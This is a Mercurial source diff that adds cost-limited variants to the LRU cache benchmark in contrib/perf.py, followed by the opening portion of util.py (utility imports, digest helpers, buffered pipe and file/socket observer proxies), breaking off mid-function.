1741 1741 clearfilecache(repo, b'obsstore')
1742 1742 obsolete.getrevs(repo, name)
1743 1743 return d
1744 1744
1745 1745 allobs = sorted(obsolete.cachefuncs)
1746 1746 if names:
1747 1747 allobs = [n for n in allobs if n in names]
1748 1748
1749 1749 for name in allobs:
1750 1750 timer(getobs(name), title=name)
1751 1751
1752 1752 def getfiltered(name):
1753 1753 def d():
1754 1754 repo.invalidatevolatilesets()
1755 1755 if opts[b'clear_obsstore']:
1756 1756 clearfilecache(repo, b'obsstore')
1757 1757 repoview.filterrevs(repo, name)
1758 1758 return d
1759 1759
1760 1760 allfilter = sorted(repoview.filtertable)
1761 1761 if names:
1762 1762 allfilter = [n for n in allfilter if n in names]
1763 1763
1764 1764 for name in allfilter:
1765 1765 timer(getfiltered(name), title=name)
1766 1766 fm.end()
1767 1767
1768 1768 @command(b'perfbranchmap',
1769 1769 [(b'f', b'full', False,
1770 1770 b'Includes build time of subset'),
1771 1771 (b'', b'clear-revbranch', False,
1772 1772 b'purge the revbranch cache between computation'),
1773 1773 ] + formatteropts)
1774 1774 def perfbranchmap(ui, repo, *filternames, **opts):
1775 1775 """benchmark the update of a branchmap
1776 1776
1777 1777 This benchmarks the full repo.branchmap() call with read and write disabled
1778 1778 """
1779 1779 full = opts.get(b"full", False)
1780 1780 clear_revbranch = opts.get(b"clear_revbranch", False)
1781 1781 timer, fm = gettimer(ui, opts)
1782 1782 def getbranchmap(filtername):
1783 1783 """generate a benchmark function for the filtername"""
1784 1784 if filtername is None:
1785 1785 view = repo
1786 1786 else:
1787 1787 view = repo.filtered(filtername)
1788 1788 def d():
1789 1789 if clear_revbranch:
1790 1790 repo.revbranchcache()._clear()
1791 1791 if full:
1792 1792 view._branchcaches.clear()
1793 1793 else:
1794 1794 view._branchcaches.pop(filtername, None)
1795 1795 view.branchmap()
1796 1796 return d
1797 1797 # add filter in smaller subset to bigger subset
1798 1798 possiblefilters = set(repoview.filtertable)
1799 1799 if filternames:
1800 1800 possiblefilters &= set(filternames)
1801 1801 subsettable = getbranchmapsubsettable()
1802 1802 allfilters = []
1803 1803 while possiblefilters:
1804 1804 for name in possiblefilters:
1805 1805 subset = subsettable.get(name)
1806 1806 if subset not in possiblefilters:
1807 1807 break
1808 1808 else:
1809 1809 assert False, b'subset cycle %s!' % possiblefilters
1810 1810 allfilters.append(name)
1811 1811 possiblefilters.remove(name)
1812 1812
1813 1813 # warm the cache
1814 1814 if not full:
1815 1815 for name in allfilters:
1816 1816 repo.filtered(name).branchmap()
1817 1817 if not filternames or b'unfiltered' in filternames:
1818 1818 # add unfiltered
1819 1819 allfilters.append(None)
1820 1820
1821 1821 branchcacheread = safeattrsetter(branchmap, b'read')
1822 1822 branchcachewrite = safeattrsetter(branchmap.branchcache, b'write')
1823 1823 branchcacheread.set(lambda repo: None)
1824 1824 branchcachewrite.set(lambda bc, repo: None)
1825 1825 try:
1826 1826 for name in allfilters:
1827 1827 printname = name
1828 1828 if name is None:
1829 1829 printname = b'unfiltered'
1830 1830 timer(getbranchmap(name), title=str(printname))
1831 1831 finally:
1832 1832 branchcacheread.restore()
1833 1833 branchcachewrite.restore()
1834 1834 fm.end()
1835 1835
1836 1836 @command(b'perfbranchmapload', [
1837 1837 (b'f', b'filter', b'', b'Specify repoview filter'),
1838 1838 (b'', b'list', False, b'List brachmap filter caches'),
1839 1839 ] + formatteropts)
1840 1840 def perfbranchmapread(ui, repo, filter=b'', list=False, **opts):
1841 1841 """benchmark reading the branchmap"""
1842 1842 if list:
1843 1843 for name, kind, st in repo.cachevfs.readdir(stat=True):
1844 1844 if name.startswith(b'branch2'):
1845 1845 filtername = name.partition(b'-')[2] or b'unfiltered'
1846 1846 ui.status(b'%s - %s\n'
1847 1847 % (filtername, util.bytecount(st.st_size)))
1848 1848 return
1849 1849 if filter:
1850 1850 repo = repoview.repoview(repo, filter)
1851 1851 else:
1852 1852 repo = repo.unfiltered()
1853 1853 # try once without timer, the filter may not be cached
1854 1854 if branchmap.read(repo) is None:
1855 1855 raise error.Abort(b'No brachmap cached for %s repo'
1856 1856 % (filter or b'unfiltered'))
1857 1857 timer, fm = gettimer(ui, opts)
1858 1858 timer(lambda: branchmap.read(repo) and None)
1859 1859 fm.end()
1860 1860
1861 1861 @command(b'perfloadmarkers')
1862 1862 def perfloadmarkers(ui, repo):
1863 1863 """benchmark the time to parse the on-disk markers for a repo
1864 1864
1865 1865 Result is the number of markers in the repo."""
1866 1866 timer, fm = gettimer(ui)
1867 1867 svfs = getsvfs(repo)
1868 1868 timer(lambda: len(obsolete.obsstore(svfs)))
1869 1869 fm.end()
1870 1870
1871 1871 @command(b'perflrucachedict', formatteropts +
1872 [(b'', b'size', 4, b'size of cache'),
1872 [(b'', b'costlimit', 0, b'maximum total cost of items in cache'),
1873 (b'', b'mincost', 0, b'smallest cost of items in cache'),
1874 (b'', b'maxcost', 100, b'maximum cost of items in cache'),
1875 (b'', b'size', 4, b'size of cache'),
1873 1876 (b'', b'gets', 10000, b'number of key lookups'),
1874 1877 (b'', b'sets', 10000, b'number of key sets'),
1875 1878 (b'', b'mixed', 10000, b'number of mixed mode operations'),
1876 1879 (b'', b'mixedgetfreq', 50, b'frequency of get vs set ops in mixed mode')],
1877 1880 norepo=True)
1878 def perflrucache(ui, size=4, gets=10000, sets=10000, mixed=10000,
1879 mixedgetfreq=50, **opts):
1881 def perflrucache(ui, mincost=0, maxcost=100, costlimit=0, size=4,
1882 gets=10000, sets=10000, mixed=10000, mixedgetfreq=50, **opts):
1880 1883 def doinit():
1881 1884 for i in xrange(10000):
1882 1885 util.lrucachedict(size)
1883 1886
1887 costrange = list(range(mincost, maxcost + 1))
1888
1884 1889 values = []
1885 1890 for i in xrange(size):
1886 1891 values.append(random.randint(0, sys.maxint))
1887 1892
1888 1893 # Get mode fills the cache and tests raw lookup performance with no
1889 1894 # eviction.
1890 1895 getseq = []
1891 1896 for i in xrange(gets):
1892 1897 getseq.append(random.choice(values))
1893 1898
1894 1899 def dogets():
1895 1900 d = util.lrucachedict(size)
1896 1901 for v in values:
1897 1902 d[v] = v
1898 1903 for key in getseq:
1899 1904 value = d[key]
1900 1905 value # silence pyflakes warning
1901 1906
1907 def dogetscost():
1908 d = util.lrucachedict(size, maxcost=costlimit)
1909 for i, v in enumerate(values):
1910 d.insert(v, v, cost=costs[i])
1911 for key in getseq:
1912 try:
1913 value = d[key]
1914 value # silence pyflakes warning
1915 except KeyError:
1916 pass
1917
1902 1918 # Set mode tests insertion speed with cache eviction.
1903 1919 setseq = []
1920 costs = []
1904 1921 for i in xrange(sets):
1905 1922 setseq.append(random.randint(0, sys.maxint))
1923 costs.append(random.choice(costrange))
1906 1924
1907 1925 def doinserts():
1908 1926 d = util.lrucachedict(size)
1909 1927 for v in setseq:
1910 1928 d.insert(v, v)
1911 1929
1930 def doinsertscost():
1931 d = util.lrucachedict(size, maxcost=costlimit)
1932 for i, v in enumerate(setseq):
1933 d.insert(v, v, cost=costs[i])
1934
1912 1935 def dosets():
1913 1936 d = util.lrucachedict(size)
1914 1937 for v in setseq:
1915 1938 d[v] = v
1916 1939
1917 1940 # Mixed mode randomly performs gets and sets with eviction.
1918 1941 mixedops = []
1919 1942 for i in xrange(mixed):
1920 1943 r = random.randint(0, 100)
1921 1944 if r < mixedgetfreq:
1922 1945 op = 0
1923 1946 else:
1924 1947 op = 1
1925 1948
1926 mixedops.append((op, random.randint(0, size * 2)))
1949 mixedops.append((op,
1950 random.randint(0, size * 2),
1951 random.choice(costrange)))
1927 1952
1928 1953 def domixed():
1929 1954 d = util.lrucachedict(size)
1930 1955
1931 for op, v in mixedops:
1956 for op, v, cost in mixedops:
1932 1957 if op == 0:
1933 1958 try:
1934 1959 d[v]
1935 1960 except KeyError:
1936 1961 pass
1937 1962 else:
1938 1963 d[v] = v
1939 1964
1965 def domixedcost():
1966 d = util.lrucachedict(size, maxcost=costlimit)
1967
1968 for op, v, cost in mixedops:
1969 if op == 0:
1970 try:
1971 d[v]
1972 except KeyError:
1973 pass
1974 else:
1975 d.insert(v, v, cost=cost)
1976
1940 1977 benches = [
1941 1978 (doinit, b'init'),
1942 (dogets, b'gets'),
1943 (doinserts, b'inserts'),
1944 (dosets, b'sets'),
1945 (domixed, b'mixed')
1946 1979 ]
1947 1980
1981 if costlimit:
1982 benches.extend([
1983 (dogetscost, b'gets w/ cost limit'),
1984 (doinsertscost, b'inserts w/ cost limit'),
1985 (domixedcost, b'mixed w/ cost limit'),
1986 ])
1987 else:
1988 benches.extend([
1989 (dogets, b'gets'),
1990 (doinserts, b'inserts'),
1991 (dosets, b'sets'),
1992 (domixed, b'mixed')
1993 ])
1994
1948 1995 for fn, title in benches:
1949 1996 timer, fm = gettimer(ui, opts)
1950 1997 timer(fn, title=title)
1951 1998 fm.end()
1952 1999
1953 2000 @command(b'perfwrite', formatteropts)
1954 2001 def perfwrite(ui, repo, **opts):
1955 2002 """microbenchmark ui.write
1956 2003 """
1957 2004 timer, fm = gettimer(ui, opts)
1958 2005 def write():
1959 2006 for i in range(100000):
1960 2007 ui.write((b'Testing write performance\n'))
1961 2008 timer(write)
1962 2009 fm.end()
1963 2010
1964 2011 def uisetup(ui):
1965 2012 if (util.safehasattr(cmdutil, b'openrevlog') and
1966 2013 not util.safehasattr(commands, b'debugrevlogopts')):
1967 2014 # for "historical portability":
1968 2015 # In this case, Mercurial should be 1.9 (or a79fea6b3e77) -
1969 2016 # 3.7 (or 5606f7d0d063). Therefore, '--dir' option for
1970 2017 # openrevlog() should cause failure, because it has been
1971 2018 # available since 3.5 (or 49c583ca48c4).
1972 2019 def openrevlog(orig, repo, cmd, file_, opts):
1973 2020 if opts.get(b'dir') and not util.safehasattr(repo, b'dirlog'):
1974 2021 raise error.Abort(b"This version doesn't support --dir option",
1975 2022 hint=b"use 3.5 or later")
1976 2023 return orig(repo, cmd, file_, opts)
1977 2024 extensions.wrapfunction(cmdutil, b'openrevlog', openrevlog)
@@ -1,3941 +1,3963 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def bitsfrom(container):
139 139 bits = 0
140 140 for bit in container:
141 141 bits |= bit
142 142 return bits
143 143
144 144 # python 2.6 still have deprecation warning enabled by default. We do not want
145 145 # to display anything to standard user so detect if we are running test and
146 146 # only use python deprecation warning in this case.
147 147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 148 if _dowarn:
149 149 # explicitly unfilter our warning for python 2.7
150 150 #
151 151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 152 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 153 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 154 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 158 if _dowarn and pycompat.ispy3:
159 159 # silence warning emitted by passing user string to re.sub()
160 160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 161 r'mercurial')
162 162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 163 DeprecationWarning, r'mercurial')
164 164 # TODO: reinvent imp.is_frozen()
165 165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 166 DeprecationWarning, r'mercurial')
167 167
168 168 def nouideprecwarn(msg, version, stacklevel=1):
169 169 """Issue an python native deprecation warning
170 170
171 171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 172 """
173 173 if _dowarn:
174 174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 175 " update your code.)") % version
176 176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 177
178 178 DIGESTS = {
179 179 'md5': hashlib.md5,
180 180 'sha1': hashlib.sha1,
181 181 'sha512': hashlib.sha512,
182 182 }
183 183 # List of digest types from strongest to weakest
184 184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 185
186 186 for k in DIGESTS_BY_STRENGTH:
187 187 assert k in DIGESTS
188 188
189 189 class digester(object):
190 190 """helper to compute digests.
191 191
192 192 This helper can be used to compute one or more digests given their name.
193 193
194 194 >>> d = digester([b'md5', b'sha1'])
195 195 >>> d.update(b'foo')
196 196 >>> [k for k in sorted(d)]
197 197 ['md5', 'sha1']
198 198 >>> d[b'md5']
199 199 'acbd18db4cc2f85cedef654fccc4a4d8'
200 200 >>> d[b'sha1']
201 201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 202 >>> digester.preferred([b'md5', b'sha1'])
203 203 'sha1'
204 204 """
205 205
206 206 def __init__(self, digests, s=''):
207 207 self._hashes = {}
208 208 for k in digests:
209 209 if k not in DIGESTS:
210 210 raise error.Abort(_('unknown digest type: %s') % k)
211 211 self._hashes[k] = DIGESTS[k]()
212 212 if s:
213 213 self.update(s)
214 214
215 215 def update(self, data):
216 216 for h in self._hashes.values():
217 217 h.update(data)
218 218
219 219 def __getitem__(self, key):
220 220 if key not in DIGESTS:
221 221 raise error.Abort(_('unknown digest type: %s') % k)
222 222 return nodemod.hex(self._hashes[key].digest())
223 223
224 224 def __iter__(self):
225 225 return iter(self._hashes)
226 226
227 227 @staticmethod
228 228 def preferred(supported):
229 229 """returns the strongest digest type in both supported and DIGESTS."""
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 if k in supported:
233 233 return k
234 234 return None
235 235
236 236 class digestchecker(object):
237 237 """file handle wrapper that additionally checks content against a given
238 238 size and digests.
239 239
240 240 d = digestchecker(fh, size, {'md5': '...'})
241 241
242 242 When multiple digests are given, all of them are validated.
243 243 """
244 244
245 245 def __init__(self, fh, size, digests):
246 246 self._fh = fh
247 247 self._size = size
248 248 self._got = 0
249 249 self._digests = dict(digests)
250 250 self._digester = digester(self._digests.keys())
251 251
252 252 def read(self, length=-1):
253 253 content = self._fh.read(length)
254 254 self._digester.update(content)
255 255 self._got += len(content)
256 256 return content
257 257
258 258 def validate(self):
259 259 if self._size != self._got:
260 260 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 261 (self._size, self._got))
262 262 for k, v in self._digests.items():
263 263 if v != self._digester[k]:
264 264 # i18n: first parameter is a digest name
265 265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 266 (k, v, self._digester[k]))
267 267
268 268 try:
269 269 buffer = buffer
270 270 except NameError:
271 271 def buffer(sliceable, offset=0, length=None):
272 272 if length is not None:
273 273 return memoryview(sliceable)[offset:offset + length]
274 274 return memoryview(sliceable)[offset:]
275 275
276 276 _chunksize = 4096
277 277
278 278 class bufferedinputpipe(object):
279 279 """a manually buffered input pipe
280 280
281 281 Python will not let us use buffered IO and lazy reading with 'polling' at
282 282 the same time. We cannot probe the buffer state and select will not detect
283 283 that data are ready to read if they are already buffered.
284 284
285 285 This class let us work around that by implementing its own buffering
286 286 (allowing efficient readline) while offering a way to know if the buffer is
287 287 empty from the output (allowing collaboration of the buffer with polling).
288 288
289 289 This class lives in the 'util' module because it makes use of the 'os'
290 290 module from the python stdlib.
291 291 """
292 292 def __new__(cls, fh):
293 293 # If we receive a fileobjectproxy, we need to use a variation of this
294 294 # class that notifies observers about activity.
295 295 if isinstance(fh, fileobjectproxy):
296 296 cls = observedbufferedinputpipe
297 297
298 298 return super(bufferedinputpipe, cls).__new__(cls)
299 299
300 300 def __init__(self, input):
301 301 self._input = input
302 302 self._buffer = []
303 303 self._eof = False
304 304 self._lenbuf = 0
305 305
306 306 @property
307 307 def hasbuffer(self):
308 308 """True is any data is currently buffered
309 309
310 310 This will be used externally a pre-step for polling IO. If there is
311 311 already data then no polling should be set in place."""
312 312 return bool(self._buffer)
313 313
314 314 @property
315 315 def closed(self):
316 316 return self._input.closed
317 317
318 318 def fileno(self):
319 319 return self._input.fileno()
320 320
321 321 def close(self):
322 322 return self._input.close()
323 323
324 324 def read(self, size):
325 325 while (not self._eof) and (self._lenbuf < size):
326 326 self._fillbuffer()
327 327 return self._frombuffer(size)
328 328
329 329 def unbufferedread(self, size):
330 330 if not self._eof and self._lenbuf == 0:
331 331 self._fillbuffer(max(size, _chunksize))
332 332 return self._frombuffer(min(self._lenbuf, size))
333 333
334 334 def readline(self, *args, **kwargs):
335 335 if 1 < len(self._buffer):
336 336 # this should not happen because both read and readline end with a
337 337 # _frombuffer call that collapse it.
338 338 self._buffer = [''.join(self._buffer)]
339 339 self._lenbuf = len(self._buffer[0])
340 340 lfi = -1
341 341 if self._buffer:
342 342 lfi = self._buffer[-1].find('\n')
343 343 while (not self._eof) and lfi < 0:
344 344 self._fillbuffer()
345 345 if self._buffer:
346 346 lfi = self._buffer[-1].find('\n')
347 347 size = lfi + 1
348 348 if lfi < 0: # end of file
349 349 size = self._lenbuf
350 350 elif 1 < len(self._buffer):
351 351 # we need to take previous chunks into account
352 352 size += self._lenbuf - len(self._buffer[-1])
353 353 return self._frombuffer(size)
354 354
355 355 def _frombuffer(self, size):
356 356 """return at most 'size' data from the buffer
357 357
358 358 The data are removed from the buffer."""
359 359 if size == 0 or not self._buffer:
360 360 return ''
361 361 buf = self._buffer[0]
362 362 if 1 < len(self._buffer):
363 363 buf = ''.join(self._buffer)
364 364
365 365 data = buf[:size]
366 366 buf = buf[len(data):]
367 367 if buf:
368 368 self._buffer = [buf]
369 369 self._lenbuf = len(buf)
370 370 else:
371 371 self._buffer = []
372 372 self._lenbuf = 0
373 373 return data
374 374
375 375 def _fillbuffer(self, size=_chunksize):
376 376 """read data to the buffer"""
377 377 data = os.read(self._input.fileno(), size)
378 378 if not data:
379 379 self._eof = True
380 380 else:
381 381 self._lenbuf += len(data)
382 382 self._buffer.append(data)
383 383
384 384 return data
385 385
386 386 def mmapread(fp):
387 387 try:
388 388 fd = getattr(fp, 'fileno', lambda: fp)()
389 389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 390 except ValueError:
391 391 # Empty files cannot be mmapped, but mmapread should still work. Check
392 392 # if the file is empty, and if so, return an empty buffer.
393 393 if os.fstat(fd).st_size == 0:
394 394 return ''
395 395 raise
396 396
397 397 class fileobjectproxy(object):
398 398 """A proxy around file objects that tells a watcher when events occur.
399 399
400 400 This type is intended to only be used for testing purposes. Think hard
401 401 before using it in important code.
402 402 """
403 403 __slots__ = (
404 404 r'_orig',
405 405 r'_observer',
406 406 )
407 407
408 408 def __init__(self, fh, observer):
409 409 object.__setattr__(self, r'_orig', fh)
410 410 object.__setattr__(self, r'_observer', observer)
411 411
412 412 def __getattribute__(self, name):
413 413 ours = {
414 414 r'_observer',
415 415
416 416 # IOBase
417 417 r'close',
418 418 # closed if a property
419 419 r'fileno',
420 420 r'flush',
421 421 r'isatty',
422 422 r'readable',
423 423 r'readline',
424 424 r'readlines',
425 425 r'seek',
426 426 r'seekable',
427 427 r'tell',
428 428 r'truncate',
429 429 r'writable',
430 430 r'writelines',
431 431 # RawIOBase
432 432 r'read',
433 433 r'readall',
434 434 r'readinto',
435 435 r'write',
436 436 # BufferedIOBase
437 437 # raw is a property
438 438 r'detach',
439 439 # read defined above
440 440 r'read1',
441 441 # readinto defined above
442 442 # write defined above
443 443 }
444 444
445 445 # We only observe some methods.
446 446 if name in ours:
447 447 return object.__getattribute__(self, name)
448 448
449 449 return getattr(object.__getattribute__(self, r'_orig'), name)
450 450
451 451 def __nonzero__(self):
452 452 return bool(object.__getattribute__(self, r'_orig'))
453 453
454 454 __bool__ = __nonzero__
455 455
456 456 def __delattr__(self, name):
457 457 return delattr(object.__getattribute__(self, r'_orig'), name)
458 458
459 459 def __setattr__(self, name, value):
460 460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 461
462 462 def __iter__(self):
463 463 return object.__getattribute__(self, r'_orig').__iter__()
464 464
465 465 def _observedcall(self, name, *args, **kwargs):
466 466 # Call the original object.
467 467 orig = object.__getattribute__(self, r'_orig')
468 468 res = getattr(orig, name)(*args, **kwargs)
469 469
470 470 # Call a method on the observer of the same name with arguments
471 471 # so it can react, log, etc.
472 472 observer = object.__getattribute__(self, r'_observer')
473 473 fn = getattr(observer, name, None)
474 474 if fn:
475 475 fn(res, *args, **kwargs)
476 476
477 477 return res
478 478
479 479 def close(self, *args, **kwargs):
480 480 return object.__getattribute__(self, r'_observedcall')(
481 481 r'close', *args, **kwargs)
482 482
483 483 def fileno(self, *args, **kwargs):
484 484 return object.__getattribute__(self, r'_observedcall')(
485 485 r'fileno', *args, **kwargs)
486 486
487 487 def flush(self, *args, **kwargs):
488 488 return object.__getattribute__(self, r'_observedcall')(
489 489 r'flush', *args, **kwargs)
490 490
491 491 def isatty(self, *args, **kwargs):
492 492 return object.__getattribute__(self, r'_observedcall')(
493 493 r'isatty', *args, **kwargs)
494 494
495 495 def readable(self, *args, **kwargs):
496 496 return object.__getattribute__(self, r'_observedcall')(
497 497 r'readable', *args, **kwargs)
498 498
499 499 def readline(self, *args, **kwargs):
500 500 return object.__getattribute__(self, r'_observedcall')(
501 501 r'readline', *args, **kwargs)
502 502
503 503 def readlines(self, *args, **kwargs):
504 504 return object.__getattribute__(self, r'_observedcall')(
505 505 r'readlines', *args, **kwargs)
506 506
507 507 def seek(self, *args, **kwargs):
508 508 return object.__getattribute__(self, r'_observedcall')(
509 509 r'seek', *args, **kwargs)
510 510
511 511 def seekable(self, *args, **kwargs):
512 512 return object.__getattribute__(self, r'_observedcall')(
513 513 r'seekable', *args, **kwargs)
514 514
515 515 def tell(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'tell', *args, **kwargs)
518 518
519 519 def truncate(self, *args, **kwargs):
520 520 return object.__getattribute__(self, r'_observedcall')(
521 521 r'truncate', *args, **kwargs)
522 522
523 523 def writable(self, *args, **kwargs):
524 524 return object.__getattribute__(self, r'_observedcall')(
525 525 r'writable', *args, **kwargs)
526 526
527 527 def writelines(self, *args, **kwargs):
528 528 return object.__getattribute__(self, r'_observedcall')(
529 529 r'writelines', *args, **kwargs)
530 530
531 531 def read(self, *args, **kwargs):
532 532 return object.__getattribute__(self, r'_observedcall')(
533 533 r'read', *args, **kwargs)
534 534
535 535 def readall(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readall', *args, **kwargs)
538 538
539 539 def readinto(self, *args, **kwargs):
540 540 return object.__getattribute__(self, r'_observedcall')(
541 541 r'readinto', *args, **kwargs)
542 542
543 543 def write(self, *args, **kwargs):
544 544 return object.__getattribute__(self, r'_observedcall')(
545 545 r'write', *args, **kwargs)
546 546
547 547 def detach(self, *args, **kwargs):
548 548 return object.__getattribute__(self, r'_observedcall')(
549 549 r'detach', *args, **kwargs)
550 550
551 551 def read1(self, *args, **kwargs):
552 552 return object.__getattribute__(self, r'_observedcall')(
553 553 r'read1', *args, **kwargs)
554 554
555 555 class observedbufferedinputpipe(bufferedinputpipe):
556 556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 557
558 558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 559 bypass ``fileobjectproxy``. Because of this, we need to make
560 560 ``bufferedinputpipe`` aware of these operations.
561 561
562 562 This variation of ``bufferedinputpipe`` can notify observers about
563 563 ``os.read()`` events. It also re-publishes other events, such as
564 564 ``read()`` and ``readline()``.
565 565 """
566 566 def _fillbuffer(self):
567 567 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 568
569 569 fn = getattr(self._input._observer, r'osread', None)
570 570 if fn:
571 571 fn(res, _chunksize)
572 572
573 573 return res
574 574
575 575 # We use different observer methods because the operation isn't
576 576 # performed on the actual file object but on us.
577 577 def read(self, size):
578 578 res = super(observedbufferedinputpipe, self).read(size)
579 579
580 580 fn = getattr(self._input._observer, r'bufferedread', None)
581 581 if fn:
582 582 fn(res, size)
583 583
584 584 return res
585 585
586 586 def readline(self, *args, **kwargs):
587 587 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 588
589 589 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 590 if fn:
591 591 fn(res)
592 592
593 593 return res
594 594
595 595 PROXIED_SOCKET_METHODS = {
596 596 r'makefile',
597 597 r'recv',
598 598 r'recvfrom',
599 599 r'recvfrom_into',
600 600 r'recv_into',
601 601 r'send',
602 602 r'sendall',
603 603 r'sendto',
604 604 r'setblocking',
605 605 r'settimeout',
606 606 r'gettimeout',
607 607 r'setsockopt',
608 608 }
609 609
610 610 class socketproxy(object):
611 611 """A proxy around a socket that tells a watcher when events occur.
612 612
613 613 This is like ``fileobjectproxy`` except for sockets.
614 614
615 615 This type is intended to only be used for testing purposes. Think hard
616 616 before using it in important code.
617 617 """
618 618 __slots__ = (
619 619 r'_orig',
620 620 r'_observer',
621 621 )
622 622
623 623 def __init__(self, sock, observer):
624 624 object.__setattr__(self, r'_orig', sock)
625 625 object.__setattr__(self, r'_observer', observer)
626 626
627 627 def __getattribute__(self, name):
628 628 if name in PROXIED_SOCKET_METHODS:
629 629 return object.__getattribute__(self, name)
630 630
631 631 return getattr(object.__getattribute__(self, r'_orig'), name)
632 632
633 633 def __delattr__(self, name):
634 634 return delattr(object.__getattribute__(self, r'_orig'), name)
635 635
636 636 def __setattr__(self, name, value):
637 637 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 638
639 639 def __nonzero__(self):
640 640 return bool(object.__getattribute__(self, r'_orig'))
641 641
642 642 __bool__ = __nonzero__
643 643
644 644 def _observedcall(self, name, *args, **kwargs):
645 645 # Call the original object.
646 646 orig = object.__getattribute__(self, r'_orig')
647 647 res = getattr(orig, name)(*args, **kwargs)
648 648
649 649 # Call a method on the observer of the same name with arguments
650 650 # so it can react, log, etc.
651 651 observer = object.__getattribute__(self, r'_observer')
652 652 fn = getattr(observer, name, None)
653 653 if fn:
654 654 fn(res, *args, **kwargs)
655 655
656 656 return res
657 657
658 658 def makefile(self, *args, **kwargs):
659 659 res = object.__getattribute__(self, r'_observedcall')(
660 660 r'makefile', *args, **kwargs)
661 661
